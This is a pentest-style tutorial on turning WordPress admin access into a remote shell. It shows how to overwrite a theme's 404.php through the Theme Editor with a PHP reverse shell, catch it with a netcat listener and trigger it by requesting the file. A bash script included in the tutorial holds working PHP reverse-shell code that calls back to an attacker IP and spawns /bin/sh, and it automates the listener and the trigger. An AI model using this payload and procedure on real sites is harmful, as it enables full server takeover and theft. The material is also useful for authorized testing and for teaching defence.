Reverse Shell from any WordPress Site : Admin Dashboard
The scenario: we are pentesting a WordPress site and have obtained admin credentials. After logging in we land on the admin dashboard, from which we can edit theme and plugin files.
From this position a proper reverse shell can be gained using nothing more than what we already have. Let's walk through it.
STEP 1
First, from the menu on the left-hand side of the admin dashboard, go to Appearance > Editor (named Theme Editor or Theme File Editor in newer WordPress versions) and pick 404 Template from the file list on the right.
You will see a text box containing the template's PHP code. This is where we inject our reverse shell.
STEP 2
Now remove all the PHP code from the box and paste a PHP reverse shell in its place. The pentestmonkey php-reverse-shell works well. Change the IP and port in the reverse shell to your listener's address, then click the Update File button at the bottom. This overwrites the theme's actual 404.php on disk with our reverse shell code. If the editor reports an error or the file does not change, the cause is normally not the theme itself but that the web server user cannot write to that theme's directory (if DISALLOW_FILE_EDIT is set in wp-config.php, the editor does not appear at all). In that case switch to another theme with the dropdown at the top right and inject that theme's 404 template instead.
STEP 3
Now start a netcat listener on the port you put in the shell, then trigger the reverse shell: open another tab and navigate to the theme's 404 template. It usually resides at http://IP/wordpress/wp-content/themes/the_theme_you_chose/404.php (note the plural themes directory). Requesting the file directly executes it, so you do not need WordPress to route a real 404 to it.
For example, I injected the twentyfourteen theme, so on my machine I navigated to http://IP/wordpress/wp-content/themes/twentyfourteen/404.php.
Pressing Enter triggers the shell, and your netcat listener catches it. The browser tab will appear to hang while the shell is connected; that is expected.
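The following script is an added example, not code from the original post and not pentestmonkey's shell. It wraps the attacker-side part of STEP 2 and STEP 3: rendering a small PHP reverse shell with your IP and port, building the 404 template URL, starting the listener before the page is requested (so the connect-back is not refused), and firing the request. The payload still has to be pasted into the editor by hand. Hostnames, IPs, the theme name, the file name shell.php and the nc flags are assumptions for illustration.

```bash
#!/usr/bin/env bash
# Added example (not from the original post). Attacker-side helper for the
# WordPress 404-template reverse shell: render payload, start listener, trigger.
# Assumes curl and nc (OpenBSD or GNU netcat, both accept -lvnp) are installed.

# Compact PHP reverse-shell template, constructed here (not pentestmonkey's code).
# proc_open wires the child's stdin/stdout/stderr straight to the socket.
# __IP__ and __PORT__ are placeholders filled in by render_payload.
PHP_TEMPLATE='<?php
set_time_limit(0);
$sock = fsockopen("__IP__", __PORT__);
if (!$sock) { exit; }
$spec = array(0 => $sock, 1 => $sock, 2 => $sock);
$proc = proc_open("/bin/sh -i", $spec, $pipes);
if (is_resource($proc)) { proc_close($proc); }
fclose($sock);'

# render_payload LHOST LPORT: print the template with the listener address filled in.
render_payload() {
    local lhost="$1" lport="$2"
    printf '%s\n' "$PHP_TEMPLATE" | sed -e "s/__IP__/$lhost/g" -e "s/__PORT__/$lport/g"
}

# theme_404_url BASE THEME: URL of the theme's 404 template.
# The directory is wp-content/themes/ (plural); a trailing slash on BASE is tolerated.
theme_404_url() {
    local base="${1%/}" theme="$2"
    printf '%s/wp-content/themes/%s/404.php\n' "$base" "$theme"
}

# trigger URL: request the injected page after a short delay, in the background,
# so the listener below is already up when PHP connects back.
trigger() {
    ( sleep 2; curl -s -k -o /dev/null "$1" ) &
}

# main LHOST LPORT BASE THEME
main() {
    local lhost="$1" lport="$2" base="$3" theme="$4"
    local url
    url="$(theme_404_url "$base" "$theme")"
    render_payload "$lhost" "$lport" > shell.php
    echo "[*] shell.php written. Paste it into Appearance > Editor > 404 Template,"
    echo "    click Update File, then press Enter here."
    read -r _
    echo "[*] Listening on $lport; requesting $url in 2 seconds"
    trigger "$url"
    nc -lvnp "$lport"
}

# Usage (placeholder addresses):
#   ./wp_404_shell.sh run 10.10.14.3 4444 http://10.10.10.5/wordpress twentyfourteen
if [ "${1:-}" = "run" ]; then
    shift
    main "$@"
fi
```

The listener runs in the foreground so the shell stays interactive; the page request is delayed and backgrounded instead of the other way round, because a request that arrives before nc is listening produces a refused connection and a dead shell.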